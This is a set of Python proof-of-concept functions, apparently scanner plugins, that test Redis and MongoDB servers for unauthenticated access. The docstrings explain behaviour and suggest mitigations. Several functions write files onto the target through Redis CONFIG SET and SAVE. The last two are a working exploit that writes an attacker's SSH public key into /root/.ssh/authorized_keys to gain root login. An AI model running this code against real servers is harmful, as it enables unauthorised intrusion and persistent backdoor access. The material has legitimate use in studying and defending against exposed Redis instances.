Exemplo n.º 1
def poc(url):
    """Probe a Redis instance for unauthenticated access with CONFIG SET and SAVE allowed.

    Python 2 code (``except Exception, e`` is not valid Python 3 syntax).
    ``url`` is normalised by host2IP(); a trailing ``:port`` selects the Redis
    port, otherwise 6379 is assumed. host2IP(), checkPortTcp(), redirectURL(),
    randomString() and ``redis`` come from the surrounding module.

    Returns False when none of the probed web ports accept a TCP connection,
    when INFO does not contain ``redis_version``, or when any Redis call raises
    (an AUTH-required instance raises on INFO, so it ends up here). On the
    success path the function falls off the end and returns None; ``real_url``
    is computed but never returned -- presumably a truncated ``return real_url``.

    Defensive note: a run that reaches r.save() means the instance accepted
    CONFIG SET dir/dbfilename and SAVE from an unauthenticated client, which is
    the precondition for Redis-based file writes. ``requirepass``,
    ``protected-mode yes`` / ``bind`` on a non-public interface and
    ``rename-command CONFIG ""`` close this; the SAVE below leaves
    ``/root/dump.rdb`` on the host, a useful incident-response artefact.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379

    for web_port in [80, 443, 8080, 8443]:  # look for a web service on the same host
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ':' + str(web_port))
            except Exception:
                real_url = ip + ':' + str(web_port)  # fall back to the raw host:port
            break  # TODO simplified: only the first responding port is used
    else:
        return False  # for/else: no web port answered

    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        if 'redis_version' not in r.info():  # unauthenticated access check: INFO answered without AUTH
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # writable check
        r.config_set('dir', '/root/')  # write-permission check (comment originally mentions /var/www; currently /root/ as root)
        r.config_set('dbfilename', 'dump.rdb')  # CONFIG SET allowed
        r.delete(key)
        r.save()  # SAVE allowed; writes /root/dump.rdb on the target
    except Exception, e:
        # e is unused; auth failures and network errors all land here
        return False
Exemplo n.º 2
def poc(url):
    """Probe a Redis instance for unauthenticated access with CONFIG SET and SAVE allowed.

    Same logic as the single-quoted variant above, differing only in quoting.
    Python 2 code (``except Exception, e``). ``url`` is normalised by host2IP();
    a trailing ``:port`` selects the Redis port, otherwise 6379. host2IP(),
    checkPortTcp(), redirectURL(), randomString() and ``redis`` are module-level
    names not defined here.

    Returns False when no probed web port accepts a TCP connection, when INFO
    lacks ``redis_version``, or when any Redis call raises. On success the
    function falls off the end and returns None; ``real_url`` is computed but
    never returned -- presumably a truncated ``return real_url``.

    Defensive note: reaching r.save() means CONFIG SET and SAVE are accepted
    from an unauthenticated client. Mitigate with ``requirepass``,
    ``protected-mode yes`` / a private ``bind`` and ``rename-command CONFIG ""``;
    the SAVE leaves ``/root/dump.rdb`` on the host, which is worth alerting on.
    """
    url = host2IP(url)
    ip = url.split(":")[0]
    port = int(url.split(":")[-1]) if ":" in url else 6379

    for web_port in [80, 443, 8080, 8443]:  # look for a web service on the same host
        if checkPortTcp(ip, web_port):
            try:
                real_url = redirectURL(ip + ":" + str(web_port))
            except Exception:
                real_url = ip + ":" + str(web_port)  # fall back to the raw host:port
            break  # TODO simplified: only the first responding port is used
    else:
        return False  # for/else: no web port answered

    try:
        r = redis.Redis(host=ip, port=port, db=0, socket_timeout=5)
        if "redis_version" not in r.info():  # unauthenticated access check: INFO answered without AUTH
            return False
        key = randomString(5)
        value = randomString(5)
        r.set(key, value)  # writable check
        r.config_set("dir", "/root/")  # write-permission check (comment originally mentions /var/www; currently /root/ as root)
        r.config_set("dbfilename", "dump.rdb")  # CONFIG SET allowed
        r.delete(key)
        r.save()  # SAVE allowed; writes /root/dump.rdb on the target
    except Exception, e:
        # e is unused; auth failures and network errors all land here
        return False
Exemplo n.º 3
def poc(url):
	"""Check whether MongoDB on port 27017 is reachable and accepts testConnect().

	Python 2 code (``except Exception,e``). host2IP(), checkPortTcp() and
	testConnect() are module-level helpers not defined here; what
	testConnect() actually verifies is not visible from this block.

	Returns False when the port is closed or a helper raises, the IP string
	when testConnect() succeeds, and None (falls off the end) when
	testConnect() returns a falsy value. Callers treating None and False
	alike are fine; those that check ``is False`` are not.

	Defensive note: MongoDB answering unauthenticated on a public interface
	is the condition being detected; enable access control and bind to a
	private address.
	"""
	url = host2IP(url)
	ip = url.split(':')[0]
	try:
		if not checkPortTcp(ip,27017):
			return False
		if testConnect(ip,27017):
			return ip
	except Exception,e:
		# e is unused; any helper failure is reported as not vulnerable
		return False
Exemplo n.º 4
def poc(url):
    """Check whether MongoDB on 27017 lists its databases without authentication.

    host2IP() and checkPortTcp() are module-level helpers; ``pymongo`` is an
    external dependency. ``database_names()`` is the older pymongo API
    (later versions name it ``list_database_names()`` -- verify against the
    pinned version).

    Returns ``"<ip> -> db1|db2|..."`` when at least one database name comes
    back, False when the port is closed, the listing is empty, or any call
    raises (an instance requiring auth raises on the listing and so reports
    False). The client is never closed explicitly; it is left to garbage
    collection. The 3 s ``socketTimeoutMS`` bounds each socket operation,
    not the initial connect.

    Defensive note: a non-False result means anonymous clients can enumerate
    databases -- enable authorization and bind to a private interface.
    """
    ip = host2IP(url).split(':')[0]
    port = 27017
    try:
        if not checkPortTcp(ip, port):
            return False
        conn = pymongo.MongoClient(ip, port, socketTimeoutMS=3000)
        dbs = conn.database_names()  # requires listDatabases to be permitted for an unauthenticated client
        return ip + ' -> ' + '|'.join(dbs) if dbs else False  # empty listing is reported as not vulnerable
    except Exception:
        return False
Exemplo n.º 5
def poc(url):
    """Test whether an unauthenticated Redis can be made to write ``public_key`` into /root/.ssh/authorized_keys.

    Python 2 code (``except Exception, e``). Depends on the module-level
    ``public_key`` string plus host2IP(), checkPortTcp(), randomString(),
    testConnect(), ``redis`` and ``time``; none are defined in this block.
    ``url`` is normalised by host2IP(); a trailing ``:port`` selects the Redis
    port, otherwise 6379.

    Returns True only when testConnect(ip, 22) succeeds after the write;
    None (falls off the end) when INFO lacks ``redis_version`` or
    testConnect() fails; False when port 22 is closed or a Redis call
    raises. The Redis client has no socket_timeout here, unlike the other
    variants, so a silent host can block for the library default.

    Defensive note: this is the well-known Redis file-write chain and only
    succeeds when Redis runs with write access to /root/.ssh and CONFIG SET
    is reachable without AUTH. Run Redis as an unprivileged user, set
    ``requirepass`` / ``protected-mode yes``, ``rename-command CONFIG ""``,
    and alert on authorized_keys files that start with the RDB magic
    ``REDIS`` instead of a key type. After this runs, ``CONFIG GET
    dbfilename`` on the instance still reports ``authorized_keys`` -- a
    durable indicator for incident response.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        if not checkPortTcp(ip, 22):  # no SSH, nothing to verify against
            return False
        r = redis.Redis(host=ip, port=port, db=0)
        if 'redis_version' in r.info():  # INFO answered without AUTH
            key = randomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')  # key value padded with blank lines
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()  # writes the RDB dump to /root/.ssh/authorized_keys
            r.delete(key)  # remove the temporary key again
            r.config_set('dir', '/tmp')  # dir restored; dbfilename is left as 'authorized_keys'
            time.sleep(5)  # presumably waits for the save to land -- TODO confirm
            if testConnect(ip, 22):
                return True
    except Exception, e:
        # e is unused; auth failures, network errors and CONFIG rejections all land here
        # print e
        return False
def poc(url):
    """Test whether an unauthenticated Redis can be made to write ``public_key`` into /root/.ssh/authorized_keys.

    Same chain as the variant above, but with Python 3-compatible
    ``except Exception:`` and an explicit trailing ``return False``, so every
    non-success path returns False rather than None. Depends on the
    module-level ``public_key`` plus host2IP(), checkPortTcp(),
    randomString(), testConnect(), ``redis`` and ``time``. ``url`` is
    normalised by host2IP(); a trailing ``:port`` selects the Redis port,
    otherwise 6379. The Redis client has no socket_timeout, so an
    unresponsive host blocks for the library default.

    Returns True only when testConnect(ip, 22) succeeds after the write,
    False otherwise (port 22 closed, no ``redis_version`` in INFO, SSH check
    failed, or any Redis call raised).

    Defensive note: succeeds only if Redis runs with write access to
    /root/.ssh and CONFIG SET is reachable without AUTH. Run Redis as an
    unprivileged user, set ``requirepass`` / ``protected-mode yes``,
    ``rename-command CONFIG ""``, and alert on authorized_keys files that
    start with the RDB magic ``REDIS``. ``CONFIG GET dbfilename`` still
    reporting ``authorized_keys`` afterwards is a durable IR indicator.
    """
    url = host2IP(url)
    ip = url.split(':')[0]
    port = int(url.split(':')[-1]) if ':' in url else 6379
    try:
        if not checkPortTcp(ip, 22):  # no SSH, nothing to verify against
            return False
        r = redis.Redis(host=ip, port=port, db=0)
        if 'redis_version' in r.info():  # INFO answered without AUTH
            key = randomString(10)
            r.set(key, '\n\n' + public_key + '\n\n')  # key value padded with blank lines
            r.config_set('dir', '/root/.ssh')
            r.config_set('dbfilename', 'authorized_keys')
            r.save()  # writes the RDB dump to /root/.ssh/authorized_keys
            r.delete(key)  # remove the temporary key again
            r.config_set('dir', '/tmp')  # dir restored; dbfilename is left as 'authorized_keys'
            time.sleep(5)  # presumably waits for the save to land -- TODO confirm
            if testConnect(ip, 22):
                return True
    except Exception:
        # auth failures, network errors and CONFIG rejections all land here
        return False
    return False  # SSH check failed or INFO lacked redis_version